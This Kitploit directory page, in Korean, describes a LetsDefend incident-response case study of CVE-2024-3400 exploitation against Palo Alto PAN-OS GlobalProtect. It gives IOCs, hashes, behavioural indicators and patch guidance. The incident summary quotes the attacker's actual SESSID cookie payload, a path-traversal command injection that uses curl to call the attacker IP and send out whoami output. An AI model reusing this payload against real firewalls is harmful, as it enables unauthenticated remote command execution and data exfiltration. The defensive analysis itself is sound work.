Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
letsdefend-cve2024-3400-case-study — Palo Alto PAN-OS GlobalProtect 포털을 대상으로 한 CVE-2024-3400 악용 시도에 대한 탐지, 분석 및 대응 전략. IOCs, 악용 패턴, 완화 지침 포함. | Kitploit
도구/GitHubGitHub/cyprianatsyor/letsdefend-cve2024-3400-case-study
Indicator of Compromise (IOC) ManagementVulnerability AnalysisExploitationWeb Application ExploitationForensicsDigital ForensicsCommand and ControlThreat IntelligenceLearning & Education

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
Incident Response
Log Analysis
GitHubcyprianatsyor/letsdefend-cve2024-3400-case-study

letsdefend-cve2024-3400-case-study

Palo Alto PAN-OS GlobalProtect 포털을 대상으로 한 CVE-2024-3400 악용 시도에 대한 탐지, 분석 및 대응 전략. IOCs, 악용 패턴, 완화 지침 포함.

저장소 보기
1년 전아직 검토되지 않음

letsdefend-cve2024-3400-case-study

CVE-2024-3400 악용 시도에 대한 탐지, 분석 및 대응 전략 (Palo Alto PAN-OS GlobalProtect 포털 대상). IOC, 악용 패턴 및 완화 지침 포함.

CVE-2024-3400 침해 사고 조사

🔍 개요

이 저장소는 Palo Alto Networks PAN-OS 소프트웨어의 GlobalProtect 포털을 표적으로 하는 중요한 인증되지 않은 명령 삽입 취약점인 CVE-2024-3400에 대한 세부 조사 및 위협 분석을 포함합니다.

2024년 4월 18일, 취약한 /global-protect/login.esp 엔드포인트를 사용하는 내부 PAN-OS 방화벽에 대해 악용 활동이 탐지되었습니다. 공격자는 백틱으로 실행된 curl 명령을 포함하는 조작된 SESSID 쿠키를 사용하여 144.172.79.92(플로리다주 마이애미)에 호스팅된 원격 C2 서버에 연결했습니다. 악용 페이로드는 간단한 필터를 우회하기 위해 ${IFS}를 활용했으며 PAN-OS의 텔레메트리 디렉토리를 사용하여 악성 활동을 단계적으로 수행했습니다. 방화벽은 200 OK로 응답했으며, 이는 페이로드가 성공적으로 실행되었을 가능성이 있음을 나타냅니다.

사고 개요

📄 사고 요약

  • 이벤트 ID: 249

  • 탐지 규칙: SOC274 – PAN-OS 명령 삽입 악용

  • 이벤트 시간: 2024년 4월 18일 03:09 UTC

  • 호스트명: PA-Firewall-01

  • 대상 IP: 172.16.17.139

  • 출발지 IP: 144.172.79.92

  • 요청 메서드: POST

  • 엔드포인트: /global-protect/login.esp

  • 쿠키 페이로드: SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaacurl${IFS}144.172.79.92:4444?user=$(whoami)

  • 악성 해시:

  • SHA256: 3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac

  • MD5: 0c1554888ce9ed0da1583dbdf7b31651

  • 악성 스크립트: update.py (을 사용하여 실행됨)

🧠 위협 인텔리전스

위협 인텔

1단계: malpedia 검색을 통한 초기 악용 탐지

조사 1단계

2단계: 해시 분석 및 조사

조사 2단계

3단계: 추가 조사

조사 3단계

4단계: IP 주소 조사

조사 4단계

🧠 행동 지표

  • 명령 삽입을 위한 SESSID 악용
  • 회피를 위한 ${IFS} 사용
  • /opt/panlogs/tmp/device_telemetry에서의 페이로드 스테이징
  • 악용 후 dt_send 프로세스 관여
  • 포트 4444에서 공격자 IP로의 네트워크 콜백

📄 로그 증거

로그 샘플


🧩 해시 연관성

해시 일치


✅ LetsDefend 획득 포인트

핵심 포인트

🚨 영향

  • 핵심 보안 장비에 대한 원격 인증되지 않은 명령 실행
  • 공격자가 제어하는 Python 페이로드의 다운로드 및 실행 가능성
  • 스테이징 또는 유출을 위한 PAN-OS 내부 텔레메트리 메커니즘 악용
  • 알려진 악성 IP로부터의 트래픽 허용

✅ 권장 대응 조치

  1. PAN-OS 패치 적용: 10.2.9-h1, 11.0.4-h1, 11.1.2-h3 버전으로 업데이트
  2. 악성 IP 차단: 144.172.79.92
  3. 침해 지표(IOC) 검색: 로그 및 파일 시스템에서 탐색
  4. 텔레메트리 디렉토리 검사: 의심스러운 파일 또는 실행 동작 확인
  5. 영향 받은 시스템 격리 및 전체 포렌식 분석 수행

📁 내용

  • logs/: 파싱된 로그 및 원시 탐지 로그
  • ioc/: 공격과 관련된 파일 해시 및 IP
  • analysis/: 악용 동작 및 프로세스 추적 심층 분석
  • report/: 조사 로그 및 코드의 요약 및 이미지

CVE-2024-3400이란?

CVE-2024-3400은 Palo Alto Networks PAN-OS의 GlobalProtect 게이트웨이에 특별히 영향을 미치는 중요한 취약점입니다. 공개적으로 알려진 내용은 다음과 같습니다:

🔥 CVE-2024-3400 – Palo Alto PAN-OS 명령 삽입 취약점

CVSS 점수: 10.0 (Critical)

게시일: 2024년 4월

영향을 받는 제품: GlobalProtect가 활성화된 PAN-OS 10.2, 11.0, 11.1

악용: 실제 환경에서 확인됨 (제로데이)

취약점 유형: 인증되지 않은 명령 삽입

🧠 위험은 무엇인가요?

CVE-2024-3400을 통해 인증되지 않은 공격자는 방화벽 운영 체제에서 임의의 명령을 실행할 수 있습니다. 이는 자격 증명 없이 영향을 받는 장치에 대한 완전한 제어권을 부여하며, Palo Alto 방화벽에 의존하는 모든 기업에 심각한 침해 지점이 됩니다.

⚠️ 악용에 필요한 조건:

GlobalProtect 게이트웨이가 활성화되어 있어야 합니다. 특정 PAN-OS 버전(10.2.x, 11.0.x, 11.1.x). 추가 보안 계층 뒤에 있지 않다면 인터넷을 통해 악용 가능합니다.

🔎 공격자들은 무엇을 하고 있나요?

삽입 결함을 악용하기 위해 조작된 요청을 전송합니다. 원격 셸을 배포하거나 2단계 페이로드를 다운로드합니다. 관찰된 동작은 다음과 같습니다: 조작된 URL을 통한 명령 실행 지속성 메커니즘 네트워크 내 측면 이동

🛡️ 완화 및 권장 사항:

즉시 패치: Palo Alto는 수정 사항을 출시했습니다. 취약하지 않은 버전(예: 10.2.9-h1, 11.0.4-h1, 11.1.2-h3 이상)으로 업그레이드하세요. 침해 지표(IOC) 확인: 의심스러운 프로세스, 외부 연결, 비정상적인 CLI 기록 등을 확인합니다. Shodan 또는 자산 인벤토리와 같은 도구를 사용하여 취약한 장비를 찾습니다.

🛠️ 조사 방법 (예: LetsDefend 또는 SIEM 사용):

GlobalProtect에 유효한 인증 없이 액세스하는 외부 IP를 확인합니다. 로그에서 의심스러운 명령 실행(show system processes, cat /etc/passwd 등)을 확인합니다. 방화벽 동작을 모니터링하고 비정상적인 외부 연결에 대해 경고합니다.


이 저장소는 내부 조사 보고서이자 PAN-OS 취약점의 실제 악용을 이해하려는 방어자를 위한 교육 리소스 역할을 합니다. 기여 및 추가 관찰을 환영합니다.

도구 다운로드
/usr/bin/python3